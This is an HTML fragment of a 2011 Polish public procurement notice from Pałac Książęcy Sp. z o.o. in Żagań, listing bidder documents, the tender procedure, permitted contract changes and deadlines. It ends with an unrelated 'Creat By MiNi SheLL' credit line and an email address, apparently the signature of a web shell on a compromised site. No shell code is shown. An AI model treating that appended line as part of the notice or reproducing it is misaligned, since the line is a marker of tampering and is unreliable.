<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.6.Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień  publicznych dopuszcza możliwość zmian postanowień zawartej umowy w   stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy: 
    1) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem że:  
         - zachodzi konieczność wykonania robót dodatkowych na zadaniu o wykonanie robót budowanych, których wykonanie w sposób obiektywny uniemożliwia  terminowe zakończenie realizacji przedmiotu zamówienia,  
         - prace objęte umową o wykonanie robót budowlanych zostały wstrzymane  przez właściwe organy z przyczyn niezależnych od Wykonawcy lub też   wystąpiły warunki atmosferyczne, które ze względów obiektywnych  uniemożliwiają wykonanie robót budowlanych zgodnie z normami   techniczno- budowlanymi, co uniemożliwia terminowe zakończenie realizacji  przedmiotu  umowy,
         - zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji o wykonanie robót budowlanych danych, zgody osób trzecich  lub właściwych organów;
     2) w zakresie zmniejszenia / zwiększenia przedmiotu zamówienia pod warunkiem, że:
         - z niemożliwych do przewidzenia na etapie planowania inwestycji o roboty  budowlane przyczyn, wykonanie całości przedmiotu zamówienia napotyka na  istotne trudności, których przezwyciężenie wymagałoby poniesienia niewspółmiernie wysokich kosztów,
         - zachodzi konieczność udzielenia zamówień dodatkowych nieobjętych zamówieniem podstawowym Wykonawcy robót budowanych na podstawie  art.67 ust.1 pkt  5 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.palac.zagan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PAŁAC KSIĄŻĘCY Sp. z o.o. w Żaganiu
ul. Szprotawska 4, 68-100 Żagań 
tel. 068-477-64-64, 068-477-64-84, fax. 068- 477-64-62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 11:00, miejsce: PAŁAC KSIĄŻĘCY Sp. z o.o. w Żaganiu
ul. Szprotawska 4, 68-100 Żagań 
sekretariat - pokój 269.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany:
      - ze środków własnych,
      - z kredytu bankowego,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com